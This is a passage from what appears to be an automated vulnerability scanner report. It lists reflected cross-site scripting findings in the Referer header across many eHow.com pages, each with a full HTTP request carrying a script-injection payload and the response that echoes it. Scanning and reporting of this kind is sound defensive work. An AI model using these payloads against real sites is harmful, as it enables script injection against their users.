<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow Tax Time | eHow.com
</title>
       <meta chars
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "2780c</script><script>alert(1)</script>12a8c6bf20b";

       </script>
...[SNIP]...

4.604. http://www.ehow.com/electronics/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/electronics/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44044</script><script>alert(1)</script>01615995bf6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /electronics/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=44044</script><script>alert(1)</script>01615995bf6

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:08 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71007

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Electronics - How To Information | eHow.com</titl
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "44044</script><script>alert(1)</script>01615995bf6";

       </script>
...[SNIP]...

4.605. http://www.ehow.com/family-health/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/family-health/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8064d</script><script>alert(1)</script>7e97a32cd8a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /family-health/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=8064d</script><script>alert(1)</script>7e97a32cd8a

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:08 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72112

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Family Health - How To Information | eHow.com</ti
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "8064d</script><script>alert(1)</script>7e97a32cd8a";

       </script>
...[SNIP]...

4.606. http://www.ehow.com/fashion-and-style/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/fashion-and-style/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2b8c</script><script>alert(1)</script>0b3ee37394 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /fashion-and-style/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=c2b8c</script><script>alert(1)</script>0b3ee37394

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:11 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71991

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Fashion & Style - How To Information | eHow.com</
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "c2b8c</script><script>alert(1)</script>0b3ee37394";

       </script>
...[SNIP]...

4.607. http://www.ehow.com/fitness/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/fitness/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12566</script><script>alert(1)</script>82ca7391521 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /fitness/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=12566</script><script>alert(1)</script>82ca7391521

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:09 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71749

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Fitness - How To Information | eHow.com</title>

...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "12566</script><script>alert(1)</script>82ca7391521";

       </script>
...[SNIP]...

4.608. http://www.ehow.com/flu-season/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/flu-season/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8ac4</script><script>alert(1)</script>4b44af2fc08 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /flu-season/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=d8ac4</script><script>alert(1)</script>4b44af2fc08

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:16 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63751

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Flu Season - eHow.com</title>
       <meta charset="U
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "d8ac4</script><script>alert(1)</script>4b44af2fc08";

       </script>
...[SNIP]...

4.609. http://www.ehow.com/food-and-drink/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/food-and-drink/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3116a</script><script>alert(1)</script>90cca8209f8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /food-and-drink/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=3116a</script><script>alert(1)</script>90cca8209f8

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:10 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73304

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Food & Drink - How To Information | eHow.com</tit
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "3116a</script><script>alert(1)</script>90cca8209f8";

       </script>
...[SNIP]...

4.610. http://www.ehow.com/forums.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/forums.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccef8</script><script>alert(1)</script>5bcf79e4aec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /forums.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ccef8</script><script>alert(1)</script>5bcf79e4aec

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:29 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22442

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Forums | eHow.com</title>
       <meta charset="UTF-8
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "ccef8</script><script>alert(1)</script>5bcf79e4aec";

       </script>
...[SNIP]...

4.611. http://www.ehow.com/groups.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/groups.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ddff</script><script>alert(1)</script>7de5c8273d8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /groups.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=5ddff</script><script>alert(1)</script>7de5c8273d8

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:23 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22896

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Group Directory | eHow.com</title>
       <meta chars
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "5ddff</script><script>alert(1)</script>7de5c8273d8";

       </script>
...[SNIP]...

4.612. http://www.ehow.com/healthcare/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/healthcare/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abdc2</script><script>alert(1)</script>26163dc8dc4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /healthcare/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=abdc2</script><script>alert(1)</script>26163dc8dc4

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:30 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71315

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Healthcare - How To Information | eHow.com</title
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "abdc2</script><script>alert(1)</script>26163dc8dc4";

       </script>
...[SNIP]...

4.613. http://www.ehow.com/healthy-living/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/healthy-living/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d42a7</script><script>alert(1)</script>0fa77f5b04 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /healthy-living/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=d42a7</script><script>alert(1)</script>0fa77f5b04

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:29 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71896

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Healthy Living - How To Information | eHow.com</t
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "d42a7</script><script>alert(1)</script>0fa77f5b04";

       </script>
...[SNIP]...

4.614. http://www.ehow.com/hobbies-and-science/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/hobbies-and-science/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc77a</script><script>alert(1)</script>a68361c09e5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /hobbies-and-science/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=dc77a</script><script>alert(1)</script>a68361c09e5

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:30 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72434

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Hobbies & Science - How To Information | eHow.com
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "dc77a</script><script>alert(1)</script>a68361c09e5";

       </script>
...[SNIP]...

4.615. http://www.ehow.com/holidays-and-celebrations/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/holidays-and-celebrations/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ba25</script><script>alert(1)</script>b5ee88d9cea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /holidays-and-celebrations/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=5ba25</script><script>alert(1)</script>b5ee88d9cea

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:30 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73341

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Holidays & Celebrations - How To Information | eH
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "5ba25</script><script>alert(1)</script>b5ee88d9cea";

       </script>
...[SNIP]...

4.616. http://www.ehow.com/home-building-and-remodeling/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/home-building-and-remodeling/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f166c</script><script>alert(1)</script>a4a00c14a49 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /home-building-and-remodeling/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=f166c</script><script>alert(1)</script>a4a00c14a49

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:30 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72269

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Home Building & Remodeling - How To Information |
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "f166c</script><script>alert(1)</script>a4a00c14a49";

       </script>
...[SNIP]...

4.617. http://www.ehow.com/home-design-and-decorating/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/home-design-and-decorating/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3f72</script><script>alert(1)</script>a019290626d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /home-design-and-decorating/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=f3f72</script><script>alert(1)</script>a019290626d

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:29 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72787

<!DOCTYPE html>
